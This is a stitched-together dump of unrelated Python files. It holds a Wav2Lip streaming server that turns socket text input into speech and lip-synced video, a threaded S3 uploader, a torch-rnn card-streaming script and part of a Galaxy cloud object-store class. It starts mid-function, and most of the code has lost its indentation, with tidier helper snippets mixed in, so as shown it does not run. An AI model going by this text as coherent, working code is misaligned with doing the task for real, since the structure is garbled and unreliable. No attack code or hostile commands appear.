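            q.put(('chunk %d' % i).encode())  # fixed-size chunks in the real pipeline
        done.set()                            # signal that no more data will arrive
    def consumer():
        while not (done.is_set() and q.empty()):
            try:
                q.get(timeout=0.1)            # block briefly, like the 200 ms polling below
            except queue.Empty:
                continue
    t_prod = threading.Thread(target=producer)
    t_cons = threading.Thread(target=consumer)
    t_prod.start()
    t_cons.start()
    t_prod.join()
    t_cons.join()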
import os
os.environ["OMP_NUM_THREADS"] = "1"
import numpy as np
import scipy, cv2, os, sys, argparse, audio
import json, subprocess, random, string
from tqdm import tqdm
from glob import glob
import torch, face_detection
from models import Wav2Lip
import platform
import threading, queue
import subprocess
import zipfile
import argparse
import ffmpeg
import datetime
import time
import cv2
import wave
import logging
import librosa
import pyaudio
import socket
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="../google_stt_tts/text2vid-3d1ad0183321.json"
from google.cloud import texttospeech
sys.path.insert(1, 'util')
import ffmpeg_stream
parser = argparse.ArgumentParser(description='Inference code to lip-sync videos in the wild using Wav2Lip models')
parser.add_argument('--checkpoint_path', type=str,
help='Name of saved checkpoint to load weights from', required=True)
parser.add_argument('--face', type=str,
help='Filepath of video/image that contains faces to use', required=True)
parser.add_argument('--static', type=bool,
help='If True, then use only first video frame for inference', default=False)
parser.add_argument('--fps', type=float, help='Can be specified only if input is a static image (default: 25)',
default=25., required=False)
parser.add_argument('--pads', nargs='+', type=int, default=[0, 10, 0, 0],
help='Padding (top, bottom, left, right). Please adjust to include chin at least')
parser.add_argument('--face_det_batch_size', type=int,
help='Batch size for face detection', default=16)
parser.add_argument('--wav2lip_batch_size', type=int, help='Batch size for Wav2Lip model(s)', default=128)
parser.add_argument('--resize_factor', default=1, type=int,
help='Reduce the resolution by this factor. Sometimes, best results are obtained at 480p or 720p')
parser.add_argument('--crop', nargs='+', type=int, default=[0, -1, 0, -1],
help='Crop video to a smaller region (top, bottom, left, right). Applied after resize_factor and rotate arg. '
'Useful if multiple face present. -1 implies the value will be auto-inferred based on height, width')
parser.add_argument('--box', nargs='+', type=int, default=[-1, -1, -1, -1],
help='Specify a constant bounding box for the face. Use only as a last resort if the face is not detected.'
'Also, might work only if the face is not moving around much. Syntax: (top, bottom, left, right).')
parser.add_argument('--rotate', default=False, action='store_true',
help='Sometimes videos taken from a phone can be flipped 90deg. If true, will flip video right by 90deg.'
'Use if you get a flipped result, despite feeding a normal looking video')
parser.add_argument('--nosmooth', default=False, action='store_true',
help='Prevent smoothing face detections over a short temporal window')
# IP and Port for Video Streaming
parser.add_argument("-i", "--ip", type=str, default="0.0.0.0", #172.24.92.25
help="ip address of the device")
parser.add_argument("-o", "--port", type=int, default=8080,
help="ephemeral port number of the server (1024 to 65535)")
# Port for incoming text stream
parser.add_argument('--text_port', default=50007, type=int,
help='Port for websocket server for text input (default: 50007)') # Arbitrary non-privileged port
args = parser.parse_args()
args.img_size = 96
args.audio_sr = 16000
args.BYTE_WIDTH = 2 # related to FORMAT (bytes/audio frame)
# NUM_AUDIO_SAMPLES_PER_STEP: defines the chunks in which audio is processed.
# Should be such that number of video frames within step is an integer
# NOTE: Current system assumes 3200 (i.e., 200ms chunks)
# NOTE: Can't make this much smaller, since that would make the mel so small
# that the resulting mel_chunk is shorter than the neural network architecture allows.
NUM_AUDIO_SAMPLES_PER_STEP = np.ceil(args.audio_sr*0.2).astype('int') # 200 ms for 16000 Hz
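# Illustrative helper (not used elsewhere): the step size above should correspond to a whole
# number of video frames, e.g. 3200 samples = 200 ms at 16 kHz = 5 frames at 25 fps.
# The default fps/sample-rate values are assumed; recompute if --fps or the sample rate changes.
def _video_frames_per_audio_step(fps=25.0, sr=16000, samples_per_step=3200):
    # 3200 / 16000 * 25 = 5.0 frames per 200 ms audio step
    return samples_per_step / float(sr) * fps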
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if os.path.isfile(args.face) and args.face.split('.')[1] in ['jpg', 'png', 'jpeg']:
args.static = True
def get_smoothened_boxes(boxes, T):
for i in range(len(boxes)):
if i + T > len(boxes):
window = boxes[len(boxes) - T:]
else:
window = boxes[i: i + T]
boxes[i] = np.mean(window, axis=0)
return boxes
def face_detect(images):
detector = face_detection.FaceAlignment(face_detection.LandmarksType._2D,
flip_input=False, device=device)
batch_size = args.face_det_batch_size
while 1:
predictions = []
try:
for i in range(0, len(images), batch_size):
predictions.extend(detector.get_detections_for_batch(np.array(images[i:i + batch_size])))
except RuntimeError:
if batch_size == 1:
raise RuntimeError(
'Image too big to run face detection on GPU. Please use the --resize_factor argument')
batch_size //= 2
print('Recovering from OOM error; New batch size: {}'.format(batch_size))
continue
break
results = []
pady1, pady2, padx1, padx2 = args.pads
for rect, image in zip(predictions, images):
if rect is None:
cv2.imwrite('temp/faulty_frame.jpg', image) # check this frame where the face was not detected.
raise ValueError('Face not detected! Ensure the video contains a face in all the frames.')
y1 = max(0, rect[1] - pady1)
y2 = min(image.shape[0], rect[3] + pady2)
x1 = max(0, rect[0] - padx1)
x2 = min(image.shape[1], rect[2] + padx2)
results.append([x1, y1, x2, y2])
boxes = np.array(results)
if not args.nosmooth: boxes = get_smoothened_boxes(boxes, T=5)
results = [[image[y1: y2, x1:x2], (y1, y2, x1, x2)] for image, (x1, y1, x2, y2) in zip(images, boxes)]
del detector
return results
def face_detect_wrapper(frames):
if args.box[0] == -1:
if not args.static:
face_det_results = face_detect(frames) # BGR2RGB for CNN face detection
else:
face_det_results = face_detect([frames[0]])
else:
print('Using the specified bounding box instead of face detection...')
y1, y2, x1, x2 = args.box
face_det_results = [[f[y1: y2, x1:x2], (y1, y2, x1, x2)] for f in frames]
return face_det_results
def datagen(frames, face_det_results, mels, start_frame_idx):
# start frame idx is the current frame idx in the output video
# we start from this point
img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
start_frame_idx = start_frame_idx%len(frames) # loop back
num_frames = len(mels)
# take frames from start_frame_idx to start_frame_idx+num_frames
# wrapping around if necessary
if not args.static:
if len(frames) == 1:
frames_current = frames
face_det_results_current = face_det_results
if start_frame_idx + num_frames > len(frames):
frames_current = frames[start_frame_idx:] + frames[:start_frame_idx + num_frames-len(frames)]
face_det_results_current = face_det_results[start_frame_idx:] + face_det_results[:start_frame_idx + num_frames-len(frames)]
else:
frames_current = frames[start_frame_idx:start_frame_idx+num_frames]
face_det_results_current = face_det_results[start_frame_idx:start_frame_idx+num_frames]
else:
frames_current = frames
face_det_results_current = face_det_results
for i, m in enumerate(mels):
idx = 0 if args.static else i % len(frames_current)
frame_to_save = frames_current[idx].copy()
face, coords = face_det_results_current[idx].copy()
face = cv2.resize(face, (args.img_size, args.img_size))
img_batch.append(face)
mel_batch.append(m)
frame_batch.append(frame_to_save)
coords_batch.append(coords)
if len(img_batch) >= args.wav2lip_batch_size:
img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
img_masked = img_batch.copy()
img_masked[:, args.img_size // 2:] = 0
img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
yield img_batch, mel_batch, frame_batch, coords_batch
img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
if len(img_batch) > 0:
img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
img_masked = img_batch.copy()
img_masked[:, args.img_size // 2:] = 0
img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
yield img_batch, mel_batch, frame_batch, coords_batch
# mel_step_size: size of each mel_chunk (except last one which can be shorter)
# can't be made very small due to neural network architecture (should be > roughly 3)
mel_step_size = 16
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print('Using {} for inference.'.format(device))
def _load(checkpoint_path):
if device == 'cuda':
checkpoint = torch.load(checkpoint_path)
else:
checkpoint = torch.load(checkpoint_path,
map_location=lambda storage, loc: storage)
return checkpoint
def load_model(path):
model = Wav2Lip()
print("Load checkpoint from: {}".format(path))
checkpoint = _load(path)
s = checkpoint["state_dict"]
new_s = {}
for k, v in s.items():
new_s[k.replace('module.', '')] = v
model.load_state_dict(new_s)
model = model.to(device)
return model.eval()
def text_input_thread_handler(audio_packet_queue, start_audio_input_thread, kill_audio_input_thread):
# Instantiates a client
client = texttospeech.TextToSpeechClient()
# Build the voice request, select the language code ("en-US") and the ssml
# voice gender ("female")
voice = texttospeech.VoiceSelectionParams(
language_code='en-US',
name='en-IN-Wavenet-B',
ssml_gender=texttospeech.SsmlVoiceGender.MALE)
# Select the type of audio file you want returned
audio_config = texttospeech.AudioConfig(
audio_encoding=texttospeech.AudioEncoding.LINEAR16,
sample_rate_hertz=args.audio_sr,speaking_rate=1.0, pitch=5)
HOST = '' # Symbolic name meaning all available interfaces
# Set up websocket server and listen for connections
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, args.text_port))
print ('Listening for incoming connection on port',args.text_port)
s.listen(1)
conn, addr = s.accept()
print ('Connected by', addr)
start_audio_input_thread.set()
while True:
line = b''
conn_closed = False
while True: # recv till newline
# socket.MSG_WAITALL: this parameter ensures we wait till sufficient data received
byte = conn.recv(1,socket.MSG_WAITALL)
# reading one byte at a time: not efficient!
# http://developerweb.net/viewtopic.php?id=4006 has some suggestions
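            # (a buffered line-reading alternative is sketched after this function)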
if byte == b'\n':
break
elif len(byte) == 0:
conn_closed = True
break
else:
line += byte
if conn_closed:
break
line = line.decode(encoding='UTF-8')
line = line.rstrip()
print("Input text:",line)
# Perform the text-to-speech request on the text input with the selected
# voice parameters and audio file type
# Set the text input to be synthesized
print('Synthesizing Audio')
synthesis_input = texttospeech.SynthesisInput(text=line)
response = client.synthesize_speech(
input=synthesis_input, voice=voice, audio_config=audio_config
)
audio_bytes = response.audio_content[44:] # header of length 44 at the start
print('Audio Synthesized')
audio_packet_queue.put(audio_bytes)
kill_audio_input_thread.set()
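# A hedged sketch of the buffered alternative mentioned in the comments above (not wired into
# the pipeline): read from the socket in larger chunks and split on newlines instead of one
# byte at a time. The helper name and buffer size are illustrative.
def _recv_lines(conn, bufsize=4096):
    buf = b''
    while True:
        chunk = conn.recv(bufsize)
        if not chunk:  # peer closed the connection
            break
        buf += chunk
        while b'\n' in buf:
            line, buf = buf.split(b'\n', 1)
            yield line.decode('UTF-8').rstrip()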
'''
function to set up input audio connection, write output to queues
'''
def audio_input_thread_handler(inqueue, outqueues, start_audio_input_thread, kill_audio_input_thread):
# we work in 200 ms chunks
time_per_write = 0.2
current_audio_packet_data = b''
desired_len = args.BYTE_WIDTH*NUM_AUDIO_SAMPLES_PER_STEP
# block till we have start_audio_input_thread event (set when connection to peer established)
while not start_audio_input_thread.is_set():
pass
while True:
start_time = time.time()
audio_bytes_to_write = b''
while not inqueue.empty():
# first check if we have new data coming in
current_audio_packet_data += inqueue.get()
if len(current_audio_packet_data) >= desired_len:
audio_bytes_to_write = current_audio_packet_data[:desired_len]
current_audio_packet_data = current_audio_packet_data[desired_len:]
else:
audio_bytes_to_write = current_audio_packet_data + bytearray(desired_len-len(current_audio_packet_data))
current_audio_packet_data = b''
for q in outqueues:
q.put(audio_bytes_to_write)
if kill_audio_input_thread.is_set() and len(current_audio_packet_data) == 0:
break
        # sleep for whatever is left of the 200 ms step (clamped at 0 in case processing overran it)
        time.sleep(max(0.0, time_per_write - (time.time() - start_time)))
'''
receive audio from audio_inqueue and write to fifo_filename_audio pipe in
chunks
'''
def audio_thread_handler(fifo_filename_audio, audio_inqueue):
fifo_audio_out = open(fifo_filename_audio, "wb")
# this blocks until the read for the fifo opens so we run in separate thread
# read frame one by one, process and write to fifo pipe
while True:
in_audio_frame = audio_inqueue.get()
if len(in_audio_frame) == 0:
break
ffmpeg_stream.write_audio_frame(fifo_audio_out, in_audio_frame)
fifo_audio_out.close()
##### For streaming #####
def preprocess_video():
if not os.path.isfile(args.face):
raise ValueError('--face argument must be a valid path to video/image file')
elif args.face.split('.')[1] in ['jpg', 'png', 'jpeg']:
full_frames = [cv2.imread(args.face)]
fps = args.fps
else:
video_stream = cv2.VideoCapture(args.face)
fps = video_stream.get(cv2.CAP_PROP_FPS)
print('Reading video frames...')
full_frames = []
while 1:
still_reading, frame = video_stream.read()
if not still_reading:
video_stream.release()
break
if args.resize_factor > 1:
frame = cv2.resize(frame, (frame.shape[1] // args.resize_factor, frame.shape[0] // args.resize_factor))
if args.rotate:
frame = cv2.rotate(frame, cv2.cv2.ROTATE_90_CLOCKWISE)
y1, y2, x1, x2 = args.crop
if x2 == -1: x2 = frame.shape[1]
if y2 == -1: y2 = frame.shape[0]
frame = frame[y1:y2, x1:x2]
full_frames.append(frame)
print("Number of frames available for inference: " + str(len(full_frames)))
return full_frames
def txt2vid_inference(fifo_filename_video, audio_inqueue, width, height):
# Get frames from input video
full_frames = preprocess_video()
# run face detection (precompute)
face_det_results = face_detect_wrapper(full_frames)
# Overall process works like this:
# - split wav file into small chunks
# - Initiate output stream for writing frames to intermediate video file
# - Go through the audio chunks one by one. For each chunk:
    # - compute the melspectrogram: mel
    # - convert mel into overlapping chunks (#chunks = #frames corresponding to the audio chunk,
    #   e.g., for 200 ms of audio at fps 25, we get 5 frames)
    # - Now go through the mel_chunks and the input video frames, and run the NN to compute the
    #   output frames one by one, which are written to the output stream
    # - Combine the output video with the original audio to get the final output
    # mel_idx_multiplier: this is supposed to align the audio melspec to the video fps;
    # by default it is set to 80.0/fps. It determines the mel chunking process, defining the offset
    # by which we move a window of size mel_step_size (16). For very short audio chunks, the
    # default value doesn't work well due to rounding and edge effects, leading to a very
    # short mel vector relative to the audio length. We fix this by reducing the mel_idx_multiplier,
    # which reduces the offsets of the consecutive mel chunks and makes sure we get enough
    # frames for each audio chunk.
    # NOTE: The value has been chosen for fps=25 and NUM_AUDIO_SAMPLES_PER_STEP=3200. For other values, please recalculate.
mel_idx_multiplier = 15.0 / args.fps
model = load_model(args.checkpoint_path)
print("Model loaded")
frame_h, frame_w = full_frames[0].shape[:-1]
# # initiate video writer
# out = cv2.VideoWriter('temp/result.avi',
# cv2.VideoWriter_fourcc(*'DIVX'), fps, (frame_w, frame_h))
# Setup video streaming pipe:
fifo_video_out = open(fifo_filename_video, "wb")
frames_done = 0
audio_received = 0.0
audio_data = audio_inqueue.get()
while len(audio_data) == NUM_AUDIO_SAMPLES_PER_STEP*args.BYTE_WIDTH:
# break when exactly desired length not received (so very last packet might be lost)
audio_received += NUM_AUDIO_SAMPLES_PER_STEP/args.audio_sr
curr_wav = librosa.util.buf_to_float(audio_data,n_bytes=args.BYTE_WIDTH) # convert to float
# print(curr_wav.shape)
# print('start:',audio_step*NUM_AUDIO_SAMPLES_PER_STEP)
# print('end:',(audio_step+1)*NUM_AUDIO_SAMPLES_PER_STEP)
mel = audio.melspectrogram(curr_wav)
# print(curr_wav)
# print(mel.shape)
if np.isnan(mel.reshape(-1)).sum() > 0:
raise ValueError(
'Mel contains nan! Using a TTS voice? Add a small epsilon noise to the wav file and try again')
# mel_chunk generation process. Generate overlapping chunks, with the shift in
# chunks determined by int(i * mel_idx_multiplier), and the chunk length is
# mel_step_size = 16 (except for last chunk). Two important constraints to satisfy:
# 1. len(mel_chunks) should be equal to number of frames to be generated according to
# fps and NUM_AUDIO_SAMPLES_PER_STEP
# 2. Each mel_chunk must be sufficiently long otherwise NN gives error.
mel_chunks = []
i = 0
while 1:
start_idx = int(i * mel_idx_multiplier)
if start_idx + mel_step_size > len(mel[0]):
mel_chunks.append(mel[:, len(mel[0]) - mel_step_size:])
break
mel_chunks.append(mel[:, start_idx: start_idx + mel_step_size])
i += 1
# print("Length of mel chunks: {}".format(len(mel_chunks)))
batch_size = args.wav2lip_batch_size
gen = datagen(full_frames, face_det_results, mel_chunks, frames_done)
for i, (img_batch, mel_batch, frames, coords) in enumerate(gen):
img_batch = torch.FloatTensor(np.transpose(img_batch, (0, 3, 1, 2))).to(device)
mel_batch = torch.FloatTensor(np.transpose(mel_batch, (0, 3, 1, 2))).to(device)
with torch.no_grad():
pred = model(mel_batch, img_batch)
pred = pred.cpu().numpy().transpose(0, 2, 3, 1) * 255.
for p, f, c in zip(pred, frames, coords):
y1, y2, x1, x2 = c
p = cv2.resize(p.astype(np.uint8), (x2 - x1, y2 - y1))
f[y1:y2, x1:x2] = p
# print(f.dtype)
# cv2.imshow("mywindow",f)
# cv2.waitKey(1)
# write generated frame to video writer (note: no audio right now)
# out.write(f)
out_frame_BGR = f.copy()
out_frame_RGB = out_frame_BGR[:,:,[2,1,0]]
frames_done += 1
# write to pipe
ffmpeg_stream.write_video_frame(fifo_video_out, out_frame_RGB)
print('Generated',frames_done,'frames from','{:.1f}'.format(audio_received),'s of received audio', end='\r')
audio_data = audio_inqueue.get()
print()
fifo_video_out.close()
# out.release()
# # combine original audio and generated video
# command = 'ffmpeg -y -i {} -i {} -strict -2 -q:v 1 {}'.format(args.audio, 'temp/result.avi', args.outfile)
# subprocess.call(command, shell=platform.system() != 'Windows')
def stream():
width, height = ffmpeg_stream.get_video_info(args.face)
# fifo pipes (remove file name if already exists)
fifo_filename_video = '/tmp/fifovideo'
fifo_filename_audio = '/tmp/fifoaudio'
if os.path.exists(fifo_filename_video):
os.remove(fifo_filename_video)
if os.path.exists(fifo_filename_audio):
os.remove(fifo_filename_audio)
os.mkfifo(fifo_filename_video)
os.mkfifo(fifo_filename_audio)
logger.info('fifo exists now')
process2 = ffmpeg_stream.start_ffmpeg_process2(fifo_filename_video, fifo_filename_audio, width, height, args.fps, args.port)
logger.info('Output pipe set')
######## OLD CODE: NOW REPLACED BY SIMPLER QUEUE BASED SYSTEM
# # set up pipes to transfer audio received from audio socket connection in audio_input_thread_handler
# # to audio_thread_handler and video_thread_handler
# audio_inpipe_audio_thread, audio_outpipe_audio_thread = os.pipe()
# audio_inpipe_video_thread, audio_outpipe_video_thread = os.pipe()
# # The old code led to deadlock
# # ffmpeg was still reading the initial audio and hence the video writer to ffmpeg was blocked.
# # Since the video thread was blocked on the write_video_frame, it wasn’t reading the next audio frame
# # Since the video thread wasn’t reading the next audio frame, the thread receiving audio from network and writing the audio to both audio & video handlers was blocked.
# # So the audio handler was not receiving any new audio from the thread receiving audio from network
# # Thus ffmpeg was stuck trying to get more audio from audio handler
# # The underlying reason is that the pipes have limited capacity and so the writer (specifically in third point) was blocked.
# # When I increased the capacity of the pipe to 1 MB using code from https://programtalk.com/python-examples/fcntl.F_SETPIPE_SZ/, it starts working correctly.
# fcntl.F_SETPIPE_SZ = 1031
# fcntl.fcntl(audio_outpipe_audio_thread, fcntl.F_SETPIPE_SZ, 1000000)
# fcntl.fcntl(audio_outpipe_video_thread, fcntl.F_SETPIPE_SZ, 1000000)
######## OLD CODE END
# queues for sending audio packets from T1 to T2 and T3
# unlimited capacity
audio_packet_queue_T2 = queue.Queue()
audio_packet_queue_T3 = queue.Queue()
# queue for sending generated audio from T4 to T1
# unlimited capacity
audio_packet_queue_T4 = queue.Queue()
# we run audio and video in separate threads otherwise the fifo opening blocks
outqueue_list = [audio_packet_queue_T2, audio_packet_queue_T3]
start_audio_input_thread = threading.Event() # set in T4 to start T1 execution
kill_audio_input_thread = threading.Event() # set in T4 to stop T1 execution
# create threads
audio_input_thread = threading.Thread(target=audio_input_thread_handler, \
args=(audio_packet_queue_T4,outqueue_list,start_audio_input_thread,kill_audio_input_thread))
logger.info('T1: Audio input thread launched')
video_thread = threading.Thread(target=txt2vid_inference,args=(fifo_filename_video, \
audio_packet_queue_T2, width, height))
logger.info('T2: Video thread launched')
audio_thread = threading.Thread(target=audio_thread_handler,args=(fifo_filename_audio, \
audio_packet_queue_T3))
logger.info('T3: Audio thread launched')
text_thread = threading.Thread(target=text_input_thread_handler,args=(audio_packet_queue_T4,start_audio_input_thread,kill_audio_input_thread))
logger.info('T4: Text input thread launched')
# start threads
audio_input_thread.start()
video_thread.start()
audio_thread.start()
text_thread.start()
# wait for threads to finish executing
audio_input_thread.join()
video_thread.join()
audio_thread.join()
text_thread.join()
logger.info('Waiting for ffmpeg process2')
process2.wait()
os.remove(fifo_filename_video)
os.remove(fifo_filename_audio)
logger.info('Done')
def main():
stream()
if __name__ == '__main__':
main()
|
write_to_s3.py
|
import time
import os
import progressbar
import threading
from glob import glob
from boto.s3.connection import S3Connection
progress = progressbar.ProgressBar(widgets=[progressbar.Bar('*', '[', ']'), progressbar.Percentage(), ' '])
def files_to_s3(files, bucket_name):
'''
INPUT (1) list 'files': all files to upload to s3 bucket
(2) string 'bucket_name': name of bucket to dump into
writes all files to s3 bucket using threads
'''
AWS_KEY = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET = os.environ['AWS_SECRET_ACCESS_KEY']
def upload(myfile):
conn = S3Connection(aws_access_key_id = AWS_KEY, aws_secret_access_key = AWS_SECRET)
bucket = conn.get_bucket(bucket_name)
key = bucket.new_key(myfile).set_contents_from_filename(myfile) # , cb=percent_cb, num_cb=1)
return myfile
    for fname in files:
        t = threading.Thread(target=upload, args=(fname,))
        t.start()
if __name__ == '__main__':
files = glob('n4_PNG/**')
progress.currval = 0
start_time = time.time()
for x in progress(xrange(len(files) / 100)): #avoid threading complications
time.sleep(2)
f = files[100 * x : (100 * x) + 100]
files_to_s3(f, 'n4itk-slices')
# print(str(x) + ' out of ' + str(len(files)/100))
print('------%s seconds------' % (time.time() - start_time))
|
streamcards.py
|
#!/usr/bin/env python
# -- STOLEN FROM torch-rnn/scripts/streamfile.py -- #
import os
import threading
import time
import signal
import traceback
import psutil
# correctly setting up a stream that won't get orphaned and left cluttering the operating
# system proceeds in 3 parts:
# 1) invoke install_suicide_handlers() to ensure correct behavior on interrupt
# 2) get threads by invoking spawn_stream_threads
# 3) invoke wait_and_kill_self_noreturn(threads)
# or, use the handy wrapper (streaming_noreturn) that does it for you
# (a minimal usage sketch of these steps follows the end of this section)
def spawn_stream_threads(fds, runthread, mkargs):
threads = []
for i, fd in enumerate(fds):
stream_thread = threading.Thread(target=runthread, args=mkargs(i, fd))
stream_thread.daemon = True
stream_thread.start()
threads.append(stream_thread)
return threads
def force_kill_self_noreturn():
# We have a strange issue here, which is that our threads will refuse to die
# to a normal exit() or sys.exit() because they're all blocked in write() calls
# on full pipes; the simplest workaround seems to be to ask the OS to terminate us.
# This kinda works, but...
#os.kill(os.getpid(), signal.SIGTERM)
# psutil might have useful features like checking if the pid has been reused before killing it.
# Also we might have child processes like l2e luajits to think about.
me = psutil.Process(os.getpid())
for child in me.children(recursive=True):
child.terminate()
me.terminate()
def handler_kill_self(signum, frame):
if signum != signal.SIGQUIT:
traceback.print_stack(frame)
print('caught signal {:d} - streamer sending SIGTERM to self'.format(signum))
force_kill_self_noreturn()
def install_suicide_handlers():
for sig in [signal.SIGHUP, signal.SIGINT, signal.SIGQUIT]:
signal.signal(sig, handler_kill_self)
def wait_and_kill_self_noreturn(threads):
running = True
while running:
running = False
for thread in threads:
if thread.is_alive():
running = True
if(os.getppid() <= 1):
# exit if parent process died (and we were reparented to init)
break
time.sleep(1)
force_kill_self_noreturn()
def streaming_noreturn(fds, write_stream, mkargs):
install_suicide_handlers()
threads = spawn_stream_threads(fds, write_stream, mkargs)
wait_and_kill_self_noreturn(threads)
assert False, 'should not return from streaming'
# -- END STOLEN FROM torch-rnn/scripts/streamfile.py -- #
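# Minimal usage sketch of the three steps described at the top of this file (illustrative
# only; it is never called, and `my_writer`/`my_mkargs` are made-up example names):
def _example_stream_setup(fds):
    def my_writer(i, fd):
        # each stream thread keeps writing to its file descriptor until the process is killed
        with open('/proc/self/fd/' + str(fd), 'wt') as f:
            while True:
                f.write('stream {}\n'.format(i))
    def my_mkargs(i, fd):
        return i, fd
    install_suicide_handlers()                                  # 1) behave well on interrupts
    threads = spawn_stream_threads(fds, my_writer, my_mkargs)   # 2) one daemon thread per fd
    wait_and_kill_self_noreturn(threads)                        # 3) block, then terminate self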
import sys
import random
libdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../lib')
sys.path.append(libdir)
import utils
import jdecode
import transforms
def main(args):
fds = args.fds
fname = args.fname
block_size = args.block_size
main_seed = args.seed if args.seed != 0 else None
# simple default encoding for now, will add more options with the curriculum
# learning feature
cards = jdecode.mtg_open_file(fname, verbose=True, linetrans=True)
def write_stream(i, fd):
local_random = random.Random(main_seed)
local_random.jumpahead(i)
local_cards = [card for card in cards]
with open('/proc/self/fd/'+str(fd), 'wt') as f:
while True:
local_random.shuffle(local_cards)
for card in local_cards:
f.write(card.encode(randomize_mana=True, randomize_lines=True))
f.write(utils.cardsep)
def mkargs(i, fd):
return i, fd
streaming_noreturn(fds, write_stream, mkargs)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('fds', type=int, nargs='+',
help='file descriptors to write streams to')
parser.add_argument('-f', '--fname', default=os.path.join(libdir, '../data/output.txt'),
help='file to read cards from')
parser.add_argument('-n', '--block_size', type=int, default=10000,
help='number of characters each stream should read/write at a time')
parser.add_argument('-s', '--seed', type=int, default=0,
help='random seed')
args = parser.parse_args()
main(args)
|
cloud.py
|
"""
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
)
from galaxy.util.sleeper import Sleeper
from .s3 import CloudConfigMixin, parse_config_xml
from ..objectstore import convert_bytes, ObjectStore
try:
from cloudbridge.cloud.factory import CloudProviderFactory, ProviderList
from cloudbridge.cloud.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
"Cloud ObjectStore is configured, but no CloudBridge dependency available."
"Please install CloudBridge or modify ObjectStore configuration."
)
class Cloud(ObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in an cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super(Cloud, self).__init__(config, config_dict)
self.transfer_progress = 0
auth_dict = config_dict['auth']
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.access_key = auth_dict.get('access_key')
self.secret_key = auth_dict.get('secret_key')
self.bucket = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring AWS-S3 Connection")
aws_config = {'aws_access_key': self.access_key,
'aws_secret_key': self.secret_key}
self.conn = CloudProviderFactory().create_provider(ProviderList.AWS, aws_config)
@classmethod
def parse_xml(clazz, config_xml):
return parse_config_xml(config_xml)
def to_dict(self):
as_dict = super(Cloud, self).to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
        should be sorted accordingly. The list must contain 3-element tuples,
        positioned as follows: position 0 holds the file's last accessed timestamp
        (as time.struct_time), position 1 holds the file path, and position 2 holds
        the file size (e.g., (<access time>, '/mnt/data/dataset_1.dat', 472394))
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
        # each entry is a (access_time, file_path, file_size) tuple
        for entry in file_list:
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
